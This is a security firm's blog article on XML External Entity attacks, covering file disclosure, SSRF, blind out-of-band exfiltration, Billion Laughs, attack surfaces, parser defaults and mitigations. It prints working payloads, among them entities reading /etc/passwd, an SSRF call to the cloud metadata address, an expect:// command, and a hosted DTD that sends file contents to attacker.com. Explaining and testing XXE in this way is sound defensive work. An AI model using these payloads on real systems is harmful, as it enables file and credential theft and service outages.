From the Hacker's Desk

XML External Entity Attack: The Parser Vulnerability That Reads Your Files, Scans Your Network, and Nobody Patched

> vulnerability: CWE-611 | owasp_classification: A05:2021 Security Misconfiguration | impact: file disclosure / SSRF / RCE / DoS | root_cause: the XML specification itself

Hedgehog Security 16 October 2024 23 min read
xxe xml-external-entity owasp-top-10 web-security ssrf file-disclosure injection application-security penetration-testing mitre-attack

The XML specification has a feature — and that feature is the vulnerability.

XML External Entity injection — XXE — is not a bug in any particular software. It is a feature of the XML 1.0 specification itself, exploited against applications that parse XML input without disabling that feature. The specification defines a mechanism called 'external entities' that allows an XML document to reference and include content from external sources — local files, remote URLs, internal network resources. When an XML parser processes a document containing an external entity declaration, it dutifully resolves the reference and includes the content, exactly as the specification instructs.

The problem is that in a web application context, the XML document is supplied by the user — an untrusted source — and the parser executes on the server with the server's permissions and network access. An attacker who can control the XML input can instruct the parser to read any file the application has access to, make HTTP requests to internal systems the server can reach, or consume system resources until the application crashes. The parser is not misbehaving. It is doing exactly what the XML specification tells it to do. The vulnerability exists because the feature should never have been enabled for untrusted input.

XXE first appeared in the OWASP Top 10 in 2017 as a dedicated category (A4: XML External Entities). In the 2021 update, it was consolidated into A05: Security Misconfiguration, which is accurate, because XXE is fundamentally a configuration issue. Most major XML parsers ship with external entity processing enabled by default, or have historically done so. Disabling it requires explicit configuration. Most developers never do.


How XML entities work — and how attackers abuse them.

To understand XXE, you need to understand three components of the XML specification: Document Type Definitions (DTDs), entities, and external entity declarations. A DTD defines the structure and permitted elements of an XML document. Within a DTD, you can declare entities — named storage units that act as variables within the document. An internal entity defines its content inline. An external entity defines its content by referencing an external resource via a URI.

XML Entity Types — From Harmless to Dangerous
── Internal Entity (harmless — content defined inline) ────────
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY company "Hedgehog Security">
]>
<note>
<to>Client</to>
<from>&company;</from> <!-- resolves to 'Hedgehog Security' -->
</note>

── External Entity — File Disclosure (dangerous) ─────────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
<!-- Parser reads /etc/passwd and inserts content into <foo> -->

── External Entity — SSRF (dangerous) ────────────────────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<foo>&xxe;</foo>
<!-- Parser makes HTTP request to AWS metadata service -->
<!-- Returns IAM credentials, instance identity, and more -->

── External Entity — RCE via PHP expect (critical) ───────────
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
<!-- If PHP 'expect' module is loaded, executes 'id' command -->
<!-- Returns: uid=33(www-data) gid=33(www-data) groups=33 -->

The SYSTEM keyword is the critical instruction. It tells the XML parser to resolve the entity's content from an external URI. The URI can use any scheme the parser supports: file:// for local files, http:// or https:// for remote resources, and in some implementations, specialised schemes like expect:// (PHP), jar: (Java), or gopher:// for protocol-level interaction. The attacker controls the URI. The parser resolves it with the server's permissions. That single mechanism enables every XXE attack variant.
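To make the role of SYSTEM concrete, the following minimal Python sketch lists the external entities a document declares without resolving any of them. It uses the standard library's expat bindings; the function name list_external_entities is an illustrative choice, not part of any particular tool.

```python
from urllib.parse import urlparse
from xml.parsers import expat


def list_external_entities(xml_text):
    """Return (name, scheme, uri) for each entity declared with a system identifier.

    Nothing is fetched: no ExternalEntityRefHandler is installed, so expat
    reports the declarations and skips the references.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system identifier.
        if system_id is not None:
            found.append((name, urlparse(system_id).scheme, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<foo>&xxe;</foo>"
)
print(list_external_entities(payload))
```

A helper like this is only useful for triage or logging. It does not make a vulnerable parser safe.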


Five things an attacker can do with a vulnerable XML parser.

1. Arbitrary File Disclosure
The most common XXE exploitation. The attacker defines an external entity with a file:// URI pointing to a sensitive file — /etc/passwd, /etc/shadow, application configuration files containing database credentials, private keys, or any file readable by the application's service account. If the XML parser's output is reflected in the application's response, the file contents are returned directly to the attacker. This is 'in-band' XXE — the exfiltration path is the same as the injection path. On Windows, targets include C:\Windows\win.ini, web.config files, SAM database paths, and IIS configuration.
2. Server-Side Request Forgery (SSRF)
By defining an external entity with an http:// URI, the attacker can force the server to make HTTP requests to arbitrary destinations — including internal services not accessible from the internet. Cloud metadata services (169.254.169.254 on AWS, equivalent endpoints on Azure and GCP), internal APIs, administrative interfaces, and other backend systems all become reachable. In cloud environments, accessing the metadata service can yield IAM credentials, instance roles, and secrets that enable full cloud account compromise. XXE-to-SSRF is one of the most impactful attack chains in cloud-hosted applications.
3. Internal Network Port Scanning
By defining external entities pointing to internal IP addresses and ports, the attacker can use the XML parser as a port scanner. The parser's response — whether it returns content, times out, or generates an error — reveals whether the targeted port is open, closed, or filtered. This allows an attacker to map internal network topology, discover services, and identify targets for further exploitation — all from outside the network, using the vulnerable application as a pivot point.
4. Denial of Service (Billion Laughs)
The 'Billion Laughs' attack — also called an XML bomb — exploits entity expansion rather than external entity resolution. The attacker defines a chain of nested entities, each referencing the previous one multiple times. When the parser expands the final entity, the nested references multiply exponentially — a few hundred bytes of XML expand into gigabytes of memory, crashing the parser and potentially the entire application server. This does not require external entity support — only internal entity expansion — making it effective even against some parsers that have disabled external entities but not DTD processing entirely.
5. Remote Code Execution (Rare but Devastating)
In specific configurations, XXE can achieve remote code execution. PHP applications with the 'expect' module loaded can execute system commands via the expect:// URI scheme. Java applications with certain XML parser configurations can trigger code execution via crafted jar: URIs or through XSLT processing. While RCE via XXE is less common than file disclosure or SSRF, it represents the maximum impact scenario and transforms a parser misconfiguration into complete server compromise.
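As a rough illustration of how the entity URI determines the impact, the sketch below labels what a given URI would make the parser touch. The function name and the label strings are hypothetical, and hostnames are deliberately left unclassified because that would require DNS resolution.

```python
import ipaddress
from urllib.parse import urlparse


def classify_entity_target(uri):
    """Label what an external entity URI would make the parser access."""
    parsed = urlparse(uri)
    if parsed.scheme == "file":
        return "local file read"
    if parsed.scheme not in ("http", "https"):
        return "non-HTTP scheme"
    try:
        address = ipaddress.ip_address(parsed.hostname or "")
    except ValueError:
        # Not an IP literal; classifying it would need a DNS lookup.
        return "named host"
    if address.is_link_local:
        # 169.254.0.0/16 includes the cloud metadata address used above.
        return "link-local address"
    if address.is_loopback or address.is_private:
        return "internal network address"
    return "public address"


for uri in (
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5:8080/",
    "expect://id",
):
    print(uri, "->", classify_entity_target(uri))
```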

When the parser does not show you what it read.

In many applications, the XML parser processes the input but does not reflect entity content in the response. The attacker sends a malicious document, the parser resolves the external entity, but the file contents are consumed internally without being returned. This is 'blind XXE' — the vulnerability exists, but the standard in-band exploitation technique does not work because there is no visible output channel.

Blind XXE is not a lesser vulnerability. It simply requires different exfiltration techniques: out-of-band exfiltration over HTTP, error-based exfiltration, and DNS-based exfiltration.

Blind XXE — Out-of-Band (OOB) Data Exfiltration
── Step 1: Attacker hosts a malicious DTD on their server ────
── File: https://attacker.com/evil.dtd ────────────────────────

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
'https://attacker.com/steal?data=%file;'>">
%eval;
%exfil;

── Step 2: Attacker sends payload to vulnerable application ──

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/evil.dtd">
%dtd;
]>
<foo>test</foo>

── What happens ───────────────────────────────────────────────
1. Parser loads external DTD from attacker.com
2. DTD reads /etc/hostname into %file parameter entity
3. DTD constructs URL with file contents as query parameter
4. Parser makes HTTP request to attacker.com/steal?data=...
5. Attacker's web server logs contain the file contents

── The application returns nothing. The attacker gets everything.

The second blind XXE technique uses error-based exfiltration: the attacker crafts an entity that triggers a parser error containing the file contents within the error message. If the application displays or logs detailed error messages, the attacker can read the file contents from the error output. This technique works even when outbound HTTP connections from the server are blocked, as long as error messages are visible.

DNS-based exfiltration provides a third channel. Even when HTTP outbound is restricted, DNS queries are rarely blocked. The attacker constructs an entity that makes the parser resolve a hostname containing the exfiltrated data as a subdomain, for example SENSITIVE-DATA.attacker.com. The attacker's authoritative DNS server logs the query, revealing the data. This is slower and more constrained (each DNS label is limited to 63 characters, the full name to 253, and the data must consist of characters that are valid in a hostname) but extremely difficult to block.
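The practical limits of the DNS channel can be sketched as a simple check on whether a value would survive as part of a hostname. This is a conservative approximation: the zone attacker.example and the function name are placeholders, and real resolvers may be more or less permissive about characters.

```python
import re

# Conservative hostname label: letters, digits and hyphens, 1 to 63 characters.
LABEL = re.compile(r"[A-Za-z0-9-]{1,63}")
MAX_NAME_LENGTH = 253


def fits_in_dns_name(value, zone="attacker.example"):
    """Return True if value could be prepended to zone as subdomain labels."""
    name = f"{value}.{zone}"
    labels = name.split(".")
    return len(name) <= MAX_NAME_LENGTH and all(
        LABEL.fullmatch(label) for label in labels
    )


print(fits_in_dns_name("web-01"))                           # short hostname-like value
print(fits_in_dns_name("root:x:0:0:root:/root:/bin/bash"))  # a line from /etc/passwd
```

Under these assumptions a short value such as the contents of /etc/hostname fits, while multi-line or punctuation-heavy files do not, which is why this channel tends to be used for confirmation and small secrets rather than bulk data.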


A few bytes of XML that consume gigabytes of memory.

Billion Laughs — XML Entity Expansion Bomb
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

── Expansion ──────────────────────────────────────────────────
lol9 contains 10 × lol8
lol8 contains 10 × lol7
...and so on, 9 levels deep

Total 'lol' strings: 10^9 = 1,000,000,000 (one billion)
Payload size: ~1 KB
Expanded size: ~3 GB of memory

Result: application crash, service denial, resource exhaustion

The Billion Laughs attack is elegant in its simplicity. A document smaller than 1 KB causes the parser to allocate approximately 3 GB of memory. No external entity resolution is required, only internal entity expansion. This means that parsers configured to block external entities but that still permit DTD processing remain vulnerable. The most complete defence is to disable DTD processing entirely. Where that is not possible, enforce entity expansion limits: most modern parsers support them and some apply them by default, but the setting should be verified rather than assumed.
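The arithmetic behind those figures is easy to reproduce. The sketch below assumes nine levels of expansion with ten references per level and a three-character base string, and it counts only character data, not parser overhead.

```python
def expansion(base="lol", fanout=10, levels=9):
    """Return (copies of base, characters of expanded text)."""
    copies = fanout ** levels
    return copies, copies * len(base)


copies, size = expansion()
print(copies)  # 1000000000
print(size)    # 3000000000, roughly 3 GB of character data
```

Lowering either parameter shrinks the result quickly: expansion(fanout=3, levels=4) gives 81 copies and 243 characters.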


The attack surfaces that most organisations overlook.

The obvious XXE attack surface is any endpoint that accepts XML input — SOAP web services, XML-RPC endpoints, XML-based API request bodies, and file upload functionality that processes XML formats. But the less obvious attack surfaces are where we most frequently find exploitable XXE during engagements.

Office Document Uploads (DOCX, XLSX, PPTX)
Microsoft Office documents are ZIP archives containing XML files. When an application processes uploaded Office documents — parsing content, extracting metadata, converting formats — it typically uses an XML parser on the internal XML files. If that parser has external entities enabled, a crafted DOCX file with a malicious entity in its internal XML can trigger XXE on the server. We have exploited this in document management systems, HR platforms that parse CVs, and financial applications that process uploaded spreadsheets.
SVG Image Uploads
SVG (Scalable Vector Graphics) is an XML-based image format. Applications that accept image uploads and process SVG files are parsing XML — and if the parser permits external entities, a crafted SVG triggers XXE. This is particularly common in content management systems, social platforms, and any application that generates thumbnails or previews of uploaded images.
RSS and Atom Feed Parsers
Applications that consume RSS or Atom feeds — news aggregators, monitoring dashboards, content syndication platforms — are parsing XML from external sources. If the feed parser does not disable external entities, an attacker who controls a feed source (or can poison a feed via injection) can exploit XXE.
SOAP Web Services
SOAP APIs exchange XML by definition. Legacy SOAP services are among the most common XXE targets. Many were built before XXE was widely understood and have never had their parser configurations reviewed. Enterprise environments running SOAP-based integrations with healthcare, financial, or government systems frequently harbour XXE vulnerabilities that have persisted for years.
SAML Authentication Flows
Security Assertion Markup Language (SAML) — used for single sign-on across enterprise applications — is XML-based. SAML assertions, requests, and responses are all XML documents. If the SAML parser is vulnerable to XXE, an attacker can exploit the authentication flow itself to read files from the identity provider or service provider. This is particularly impactful because SAML endpoints are authentication-adjacent and often highly trusted.
Content-Type Manipulation
Some API endpoints that nominally accept JSON will also accept XML if the Content-Type header is changed to application/xml. The backend framework automatically selects the appropriate parser based on the content type. If the XML parser is vulnerable, an attacker can exploit an endpoint that was never intended to accept XML input — simply by changing the Content-Type header. We test this on every API engagement.
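For the Office upload case, one cheap pre-parse check is to look for DTD markers inside the package before any XML parser touches it. The sketch below assumes that legitimate Office packages do not carry DOCTYPE or ENTITY declarations. The function name is hypothetical, and the byte-level search would miss parts encoded in UTF-16, so it supplements parser hardening rather than replacing it.

```python
import io
import re
import zipfile

DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def parts_with_dtd(package_bytes):
    """Return the names of XML parts in a ZIP-based document that contain DTD markers."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")) and DTD_MARKER.search(archive.read(name)):
                suspicious.append(name)
    return suspicious


# Build a tiny stand-in for a crafted DOCX entirely in memory.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as crafted:
    crafted.writestr("[Content_Types].xml", "<Types/>")
    crafted.writestr(
        "word/document.xml",
        '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><x>&xxe;</x>',
    )
print(parts_with_dtd(buffer.getvalue()))
```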

Parser defaults across languages — most are vulnerable out of the box.

Each entry below lists the parser family, its external entity default, its DTD processing default, and the key mitigation.

Java: DocumentBuilderFactory, SAXParser, DOM4J, JAXB
External entities default: Enabled by default. Java is historically the most XXE-prone language. All major Java XML parsers process external entities unless explicitly disabled.
DTD processing default: Enabled by default.
Key mitigation: Set feature 'disallow-doctype-decl' to true. Disable external general and parameter entities. Set XMLConstants.FEATURE_SECURE_PROCESSING. Each parser requires different API calls, so consult the OWASP cheat sheet for your specific parser.

PHP: libxml (SimpleXML, DOMDocument, XMLReader)
External entities default: Enabled by default in older versions. With libxml2 2.9.0 or later, external entities are not loaded by default unless entity substitution is switched on with the LIBXML_NOENT flag. PHP 8.0 requires libxml2 2.9.0 or later and deprecates libxml_disable_entity_loader(). Older PHP versions built against older libxml2 are vulnerable.
DTD processing default: Enabled by default.
Key mitigation: Call libxml_disable_entity_loader(true) on PHP < 8.0. Do not pass LIBXML_NOENT when parsing untrusted input. Use the LIBXML_NONET flag to prevent network access. Verify the libxml version: anything below 2.9 is vulnerable by default.

Python: xml.etree, xml.dom, xml.sax, lxml
External entities default: Varies by parser. xml.etree.ElementTree does not resolve external entities by default. xml.sax has not processed external general entities by default since Python 3.7.1. lxml has historically resolved entities by default, so check the resolve_entities default for your version.
DTD processing default: Varies.
Key mitigation: Use the defusedxml library, a drop-in replacement that disables all dangerous XML features by default. For lxml, set resolve_entities=False and no_network=True. The Python documentation explicitly warns about XML vulnerabilities.

.NET: XmlDocument, XmlReader, XmlTextReader, XPathDocument
External entities default: Changed across versions. .NET Framework 4.5.2+ disabled DTD processing by default in most parsers. Earlier versions are vulnerable. XmlTextReader in .NET Framework < 4.5.2 resolves external entities by default.
DTD processing default: Depends on version.
Key mitigation: Set DtdProcessing = DtdProcessing.Prohibit for all parsers. Set XmlResolver to null. Ensure XmlReaderSettings prohibits DTD. Verify your .NET Framework version: anything below 4.5.2 requires explicit hardening.

Ruby: REXML, Nokogiri
External entities default: REXML expands entities by default. Nokogiri (which uses libxml2) disables network access by default but does expand local entities.
DTD processing default: Enabled.
Key mitigation: For Nokogiri, use Nokogiri::XML::ParseOptions::NONET. For REXML, the entity expansion limit was introduced in Ruby 2.0.0 but external resolution must be manually controlled.

The pattern is consistent: most XML parsers across most languages are either vulnerable by default or have been vulnerable by default in recent historical versions. Secure configuration requires explicit action by the developer. In the absence of that action — which is the norm in the codebases we review — the application is vulnerable to XXE.
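What that explicit action looks like varies by parser. As one hedged example, the Python standard library's SAX reader exposes external general and parameter entity handling as features that can be pinned off regardless of the interpreter's default. TextCollector and parse_text are illustrative names.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Collect character data so the effect of entity handling is visible."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes):
    parser = xml.sax.make_parser()
    # Pin the features explicitly instead of relying on version-specific defaults.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


internal = b'<!DOCTYPE n [<!ENTITY company "Hedgehog Security">]><n>&company;</n>'
external = b'<!DOCTYPE f [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><f>&xxe;</f>'
print(repr(parse_text(internal)))
print(repr(parse_text(external)))
```

Internal entities still expand with this configuration, so it corresponds to blocking external resolution only and does nothing about entity expansion attacks.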


How we find and exploit XXE during engagements.

Our approach to XXE testing during penetration testing engagements follows a systematic methodology designed to identify both obvious and hidden XML parsing surfaces.

Identify XML Parsing Surfaces
We examine every endpoint for XML processing: explicit XML content types in requests, SOAP services, file upload functionality (especially Office documents and SVG), RSS/Atom feed consumption, SAML flows, and any API endpoint that might accept XML alongside JSON. We test Content-Type switching on JSON APIs — sending the same data as XML with application/xml to see if the server processes it.
Test for In-Band XXE
We inject a basic external entity declaration referencing a known file (/etc/hostname on Linux, C:\Windows\win.ini on Windows) and check whether the file contents appear in the response. If they do, we have confirmed in-band XXE and can escalate to reading sensitive files — application configuration, database credentials, private keys, source code.
Test for Blind XXE via OOB
If in-band exfiltration fails (no reflection in response), we deploy out-of-band techniques. We host a malicious DTD on our testing infrastructure and inject a parameter entity that loads it. If the server makes an HTTP request to our server, we have confirmed the parser resolves external entities — even though output is not reflected. We then use the OOB technique to exfiltrate file contents via URL parameters or DNS subdomains.
Test for Entity Expansion DoS
We send a controlled Billion Laughs payload with a reduced expansion factor (enough to detect vulnerability without causing outage) to determine whether the parser has entity expansion limits configured. If the application slows significantly or returns a memory-related error, the DoS vector is confirmed.
Escalate to SSRF
Once external entity resolution is confirmed, we test whether the parser can make HTTP requests to internal addresses — cloud metadata services (169.254.169.254), internal API endpoints, administrative interfaces. In cloud-hosted applications, accessing the metadata service via XXE-to-SSRF frequently yields IAM credentials that allow escalation beyond the application itself into the cloud infrastructure.
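A reduced-factor expansion probe of the kind described above can be generated rather than written by hand. The sketch below is an assumption about how such a probe might be built, not the exact payload used on engagements. The entity names e0, e1 and so on are arbitrary, and the defaults expand to only 243 characters.

```python
import xml.etree.ElementTree as ET


def build_expansion_probe(fanout=3, levels=4):
    """Build a small nested-entity document: fanout ** levels copies of 'lol'."""
    declarations = ['<!ENTITY e0 "lol">']
    for level in range(1, levels + 1):
        references = f"&e{level - 1};" * fanout
        declarations.append(f'<!ENTITY e{level} "{references}">')
    dtd = "".join(declarations)
    return f"<!DOCTYPE probe [{dtd}]><probe>&e{levels};</probe>"


probe = build_expansion_probe()
# ElementTree expands internal entities, so the growth can be measured locally.
expanded = ET.fromstring(probe).text
print(len(probe), len(expanded))
```

Keeping fanout and levels small is the point: the probe should show whether expansion happens at all without putting the target at risk.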

What an attacker gains and what your organisation loses.

Each entry below lists the XXE variant, what the attacker gains, the CVSS severity, and the real-world consequence.

File Disclosure
Attacker gains: Contents of any file readable by the application, such as configuration files, credentials, private keys, source code, and user data.
CVSS severity: High (7.5–9.1)
Real-world consequence: Database credentials in config files lead to full database compromise. Private keys enable impersonation. Source code reveals further vulnerabilities. /etc/shadow, where the application can read it, enables offline password cracking.

SSRF
Attacker gains: HTTP requests to internal services, including cloud metadata, admin panels, databases, and APIs not exposed to the internet.
CVSS severity: High to Critical (7.5–10.0)
Real-world consequence: AWS metadata access yields IAM credentials → full cloud account compromise. Internal admin panel access enables configuration changes. Internal API access enables data manipulation.

Blind XXE (OOB)
Attacker gains: Same as file disclosure but via an out-of-band channel. Slower but equally impactful.
CVSS severity: High (7.5–9.1)
Real-world consequence: Same consequences as in-band file disclosure. Harder to detect because exfiltration occurs via DNS or HTTP to attacker infrastructure, not in the application response.

Denial of Service
Attacker gains: Application crash, resource exhaustion, service unavailability.
CVSS severity: High (7.5)
Real-world consequence: Production application outage. 1 KB payload causes 3 GB memory allocation. Repeated attacks can prevent recovery.

Remote Code Execution
Attacker gains: Full server compromise. The attacker executes arbitrary commands with the application's privileges.
CVSS severity: Critical (9.8–10.0)
Real-world consequence: Complete control of the server. Data theft, ransomware deployment, pivot to internal network. Rare but devastating, primarily via PHP expect:// or Java-specific vectors.

How to eliminate XXE — the fix is configuration, not code.

The most important thing to understand about XXE mitigation is that it is a configuration problem with a configuration solution. You do not need to rewrite your application. You do not need to implement complex input validation. You need to configure your XML parser to not process the features that enable XXE. The OWASP XXE Prevention Cheat Sheet provides parser-specific instructions for every major language.

Primary Defence: Disable DTDs Entirely
The safest approach is to disable Document Type Definition processing entirely. If the parser will not process DTDs, it cannot process entity declarations — internal or external. This eliminates XXE, Billion Laughs, and all DTD-based attacks in a single configuration change. Most applications do not require DTD processing, and disabling it has no functional impact. This is OWASP's primary recommendation.
Secondary Defence: Disable External Entity Resolution
If DTDs cannot be fully disabled (some legacy applications depend on DTD validation), disable external entity resolution specifically. This prevents file:// and http:// entity resolution while still permitting internal entity declarations. This stops file disclosure and SSRF but does not prevent Billion Laughs (which uses only internal entities). It is a weaker defence than disabling DTDs entirely.
Use Safe-by-Default Libraries
In Python, use defusedxml instead of the standard library XML parsers. In other languages, prefer XML parsers that are secure by default or that provide a safe mode. When selecting an XML parsing library, verify its default behaviour regarding external entities and DTD processing — do not assume it is safe.
Replace XML with JSON Where Possible
If your application does not require XML-specific features (schemas, DTDs, XPath, XSLT), consider migrating to JSON. JSON has no equivalent to external entities and is structurally immune to XXE. This is a longer-term architectural change but eliminates the entire vulnerability class.
Defence in Depth: WAF Rules
Web Application Firewalls can detect and block XML payloads containing DOCTYPE declarations, ENTITY definitions, and SYSTEM keywords. This provides an additional detection layer but should not be relied upon as the primary defence — WAF bypass techniques exist, and the parser configuration fix is both more reliable and more complete.
Audit All XML Parsing Surfaces
Identify every component in your application stack that parses XML — including indirect parsers (Office document processors, SVG renderers, SAML libraries, RSS consumers). Each parser needs independent configuration review. A single overlooked parser in a file upload handler or SAML integration can provide the XXE entry point that the rest of your hardening missed.
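As a minimal sketch of the primary defence using only the Python standard library, the wrapper below refuses any document that carries a DOCTYPE before handing it to ElementTree. The names DTDForbidden and safe_fromstring are illustrative. In production code the defusedxml library mentioned above is the more complete option.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def safe_fromstring(xml_text):
    """Parse XML only if it declares no DTD, so no entities can be defined."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # raises DTDForbidden at the first DOCTYPE
    return ET.fromstring(xml_text)


print(safe_fromstring("<root><a>1</a></root>").find("a").text)
try:
    safe_fromstring('<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
except DTDForbidden as error:
    print("rejected:", error)
```

Parsing twice costs some time, but it keeps the check independent of whichever parser does the real work, which matters when that parser lives inside a third-party library.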

How to verify your applications are not vulnerable.

Quick XXE Verification Tests
── Test 1: Basic External Entity (in-band) ───────────────────
Send to any XML-accepting endpoint:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<root>&xxe;</root>

VULNERABLE if: hostname appears in response
LIKELY SAFE if: error message about DTDs or entities being disabled
INCONCLUSIVE if: no hostname and no error (output may not be reflected; run Test 2)

── Test 2: OOB Detection (blind) ──────────────────────────────
Send and monitor your Burp Collaborator / interactsh:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "http://YOUR-CALLBACK-ID.oastify.com">
]>
<root>&xxe;</root>

VULNERABLE if: HTTP/DNS callback received
SAFE if: no callback and DTD error in response

── Test 3: Content-Type Switching (hidden surface) ────────────
For JSON APIs, resend the request with:
Content-Type: application/xml
And replace the JSON body with XML containing an entity.

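VULNERABLE if: server parses the XML and resolves the entity
HIDDEN SURFACE if: server parses the XML at all (run Tests 1 and 2 against it)
SAFE if: server rejects non-JSON content types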
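On the server side, the safe outcome of Test 3 amounts to an explicit allow-list of media types checked before any body parsing. A framework-agnostic sketch follows, with hypothetical names. Real frameworks usually offer their own configuration for this.

```python
ALLOWED_MEDIA_TYPES = {"application/json"}


def is_allowed_content_type(header_value):
    """Accept a request only if its media type is on the allow-list."""
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in ALLOWED_MEDIA_TYPES


print(is_allowed_content_type("application/json; charset=utf-8"))
print(is_allowed_content_type("application/xml"))
```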

The bottom line.

XXE is a vulnerability that should not exist in 2026. The root cause is known (XML specification features enabled by default in parsers processing untrusted input). The fix is known (disable DTD processing or external entity resolution). The OWASP cheat sheet provides parser-specific instructions for every major language. And yet we continue to find XXE in production applications — particularly in SOAP services, file upload handlers, Office document processors, and SAML integrations where the XML parsing happens in a library rather than in code the development team wrote.

The reason XXE persists is the same reason most configuration-based vulnerabilities persist: the secure configuration is not the default, and developers reasonably assume that default configurations are safe. They are not. If your application parses XML from any untrusted source — user input, uploaded files, external feeds, SAML assertions, SOAP requests — your XML parser needs explicit configuration to disable the features that enable XXE. One configuration change. Applied to every parser. That is the entire mitigation.

The impact of failing to make that change ranges from embarrassing (reading /etc/passwd during a penetration test) to catastrophic (cloud account compromise via SSRF to the metadata service, or complete server takeover via RCE). The effort to exploit it ranges from trivial (a few lines of XML in Burp Suite) to moderate (blind OOB exfiltration via parameter entities). The effort to prevent it is minimal — a few lines of parser configuration. The cost-benefit calculation is not close.


Is your application vulnerable to XXE?

Our penetration testers systematically identify and exploit XXE vulnerabilities across all XML parsing surfaces — including the hidden ones in file upload handlers, SAML integrations, and APIs that accept XML via Content-Type switching. We test in-band, blind, and OOB variants, and provide specific parser configuration remediation for your technology stack.